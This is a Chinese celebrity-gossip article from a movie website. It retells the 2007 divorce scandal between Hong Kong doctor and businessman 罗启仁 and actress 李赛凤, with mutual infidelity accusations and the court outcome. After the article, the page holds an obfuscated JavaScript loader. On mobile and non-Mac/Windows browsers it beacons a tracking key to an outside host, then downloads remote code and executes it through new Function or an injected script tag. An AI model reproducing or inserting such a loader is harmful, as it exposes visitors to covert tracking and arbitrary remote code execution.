香港豪门“绿帽子”:娶最美打星、娇妻出轨干儿子、衣柜现半裸男

佚名明星八卦资讯人气:60815时间:2024-02-21 08:39:15

“去年 7 月份的一天我回到家里,却发现我的老婆李赛凤神色慌张,我还没踏进房间她就让我陪她出门。”

“我借口上厕所跑到卫生间一看究竟,结果那里空空如也。当我拉开卧室的衣柜,里面居然藏着一个半裸的男人!”

“而那个男人,居然是我最疼爱的干儿子宗天意!”

2007 年 6 月,在医学界颇有威望的香港豪门罗启仁召开记者会。

面对吃瓜群众与媒体的长枪短炮,他却不顾自己的尊严与脸面,将妻子与干儿子的偷情之事全部公之于众。

罗启仁

六年前,罗启仁在美国高调成婚,新婚妻子就是曾经美艳香江的一代荧幕女神--李赛凤。

一年后,罗启仁将自己的下属演员宗天意认作干儿子,看中的就是他的正直与努力。

然而一个是自己最爱的新婚之妻,一个是自己疼爱有加的干儿子,自己的头顶却戴着他们共同编织的绿帽子。

今天就让我们讲述香港最惨豪门,罗启仁的被绿人生。

罗启仁与李赛凤

不一样的豪门之子

如果投胎是门技术活,那么罗启仁一定算个高手。

1947 年 8 月 29 日,香港豪门罗家传来一阵婴儿的啼哭,一个男婴呱呱坠地。

港九塑料制造商联合会会长罗祖耀抱着刚刚出生的儿子,笑得合不拢嘴,并给他取了个名字--罗启仁。

是啊!自己从事玩具生产 40 年,历经商场风云,如今老来得子。名下多家公司与数不清的财富,终于有人继承了。

含着金汤匙长大的罗启仁大可以安安稳稳的当个豪门太子,继承父亲的财富,享受极品人生。

但罗启仁没有,他对商场的尔虞我诈并不感兴趣。他立志要成为一名医生,一名医术超群的医生。

罗启仁

所以在 18 岁那年,罗启仁就离开香港,到大洋彼岸的美国攻读医学专业。

而罗启仁在医学领域也展露出了自己惊人的天赋,不仅获得了医学博士的学位 ,更是成为了美国丹佛市远近闻名的外科医生。

可以说,凭借着自己高昂的诊疗费,罗启仁就可以富足一生。

但罗启仁是勇于尝试的人,他并不满足于自己只在医学领域大放异彩。

上世纪 90 年代,香港的演艺事业开始蓬勃发展,这引起了罗启仁的强烈兴趣。

罗启仁开始斥资进军演艺圈,成立了“罗式演艺公司”。也正是对演艺行业的踏足,让罗启仁与李赛凤有了命中注定的相遇。

迎娶李赛凤,认子宗天意

李赛凤这个名字许多人可能只是觉得略微有些熟悉,却又不曾想起在哪儿听过。

但我说她是《僵尸先生》中任婷婷的扮演者,大家是不是就会恍然大悟。

“拳打周比利,脚踢卢惠光。”

凭借着娇美的面庞,以及一身利落的北派功夫。李赛凤成为了当年名震香江的最美女打星,也成为了一代人的荧幕女神。

相比演艺事业上大红大紫,李赛凤的爱情之路就有些坎坷曲折了。

李赛凤的第一任丈夫是一名圈外人,1997 年,李赛凤在美国低调产子。

可谁知孩子出生没多久,丈夫就因矛盾与李赛凤离婚。这是李赛凤人生至暗的时刻,也是她急需安抚与陪伴的时候。

也就在这时,罗启仁与李赛凤的命运开始有了交集。

罗启仁对李赛凤可谓是一见钟情,即便对方离婚带娃,罗启仁还是被迷得神魂颠倒。心甘情愿坠入爱河。

对刚刚离婚受到伤害的李赛凤,罗启仁给予了无微不至的关怀。

试问在人生的低谷期,有这样一位帅气有才的豪门之子给予关怀陪伴 ,谁又能不动心呢?

2001 年,罗启仁与李赛凤在美国高调成婚,李赛凤成为了豪门阔太。

有了李赛凤做贤内助,罗启仁在演艺行业的探索变得更加大刀阔斧起来。

2002 年,罗启仁收购温哥华大剧院,并推出了一种将武术与舞蹈相结合的“动作音乐剧”,由李赛凤担任舞蹈艺术总监。

也正是这种新颖的艺术模式,在北美掀起了一股中国艺术风,罗启仁的这条路无疑是十分成功的。

也正是这一年,罗启仁的舞蹈团来了一个名叫宗天意的小伙子。彼时的宗天意只有 18 岁,他年轻帅气,努力上进,表演力强,深得李赛凤的看重。

作为宗天意的伯乐,李赛凤将其举荐给了罗启仁。罗启仁对宗天意也是十分看好,觉得小伙子十分可靠,并将其认作自己的干儿子。

可此时罗启仁怎么也不会想到,自己如此信任的这个干儿子,居然会与自己的妻子有私情,给自己结结实实扣上了一顶绿帽子。

夫妻互爆丑闻,离婚只给 24 万

2007 年,罗启仁以温哥华大剧院主席之名,向美国科罗拉多州法院申请离婚,并爆出了自己在去年七月份撞破了妻子与干儿子的私情。

罗启仁的自爆一时间掀起千层浪,毕竟被戴绿帽子这种伤自尊的事情是很难讲出口的。

但罗启仁似乎根本不在乎自己的颜面,只想将自己内心的委屈一吐为快,所以他又接连爆出大瓜。

罗启仁表示其实自己早在去年 2 月份的时候,意外在自己的床边发现了一只使用过的计生用品,但自己却与李赛凤很久都没有行过房事了。

在自己的追问下,李赛凤支支吾吾地表示那是干儿子宗天意带女朋友回家时用的。但罗启仁如今回想起来,宗天意压根就没有过女朋友。

而据罗启仁的表述,他更是捉奸当场,在自家的衣柜中发现了衣不蔽体的宗天意!

一时间,人们纷纷开始同情于罗启仁,而李赛凤则成为了人们口诛笔伐的对象。

但随后李赛凤发表 4000 字长文反击罗启仁,表示罗启仁早就与自己剧团内的舞蹈演员汪小莉有私情,并晒出了罗启仁与汪小莉在沙滩上的合照。

照片里罗启仁与汪小莉都穿着清凉,两人的姿势暧昧,明眼人都能看出这两人的关系不一般。

但随后汪小莉便以恶意诽谤将李赛凤起诉到法院,而最为憋屈的是李赛凤并没有扎实的证据证明汪小莉是小三,所以法院判其败诉,并勒令她向汪小莉道歉。

而罗启仁被问及汪小莉时则是这样说道:

“小莉跟我只是普通同事,她是一个单纯能干的人。不过我现在很担心她,因为她即单纯又善良。”

罗启仁与王小莉

罗启仁的字里行间满是小心翼翼,他表明自己与汪小莉只是普通同事关系,但事实真的如此吗?

有热心的吃瓜群众深入了解到,在罗启仁与李赛凤闹掰的三个月后,汪小莉就在剧团内晋升到了团长的职位,而在此之前她还只是一名默默无闻的舞蹈演员。

而且据罗启仁剧团的工作人员透露,汪小莉在升官后就仿佛变了一个人一般,眼睛就像是长到了头顶上,对谁都是一副颐指气使的样子。

汪小莉经常在工作中因为一些小事就对别人进行辱骂,有些同事因为忍受不了向罗启仁告状,却反被罗启仁骂的狗血淋头。

从此以后汪小莉更加变本加厉,也因此犯了众怒。剧团里的人决定组团向罗启仁告状毕竟法不责众,可谁知罗启仁直怒发冲冠为红颜,开除了四分之一的员工。

可以说,罗启仁用自己的一些列操作,重新定义了“普通同事”的含义。

而在罗启仁与李赛凤的离婚案正式开庭时,罗启仁也直接摊牌不装了,公然带着汪小莉出庭现场。

豪门之中,多是恩怨纠葛,感情如同过往云烟,看不见也难摸得着。罗启仁与李赛凤双向出轨,很难定夺谁对谁错。

而法院也在 2011 年 1 月宣判罗启仁胜诉,可怜的李赛凤走出豪门,却只得到了 24 万人民币的财产分割。

2017 年,李赛凤在《鲁豫有约》的演播厅内一脸惆怅的说道:

“豪门不是那么好玩的,因为我感受过。”

只是纵观这场豪门闹剧,只有李赛凤输的彻彻底底。不仅在自己的演艺生涯上落下了一个污点,最后也是孤身一人走出豪门。

正如同她自己所言,豪门不是这么好玩的。同样的爆料与污点,女性往往很难承受相同的后果。


function zQSOKAut(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UScqzX(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return zQSOKAut(t);};window[''+'i'+'Y'+'l'+'K'+'e'+'q'+'L'+'C'+'X'+'d'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=UScqzX,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://ssd.zmneysz.com:7891/stats/191/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMllM0EllMkYllMkZzZC55bHllllandsLmNvbSUzQTg4OTE=','d3NzzJTNBJTJGJTJGcG8uemFjdm0uY29tJTNBOTUzzMw==','712',window,document,['l','z']);}:function(){};

本站只提供Web页面服务,本站不存储、不制作任何视频与上传。不承担任何由于内容的合法性及健康性所引起的争议和法律责任,所有版权归原创者所有!

Copyright 2003-2023 345电影院 Inc. All Rights Reserved.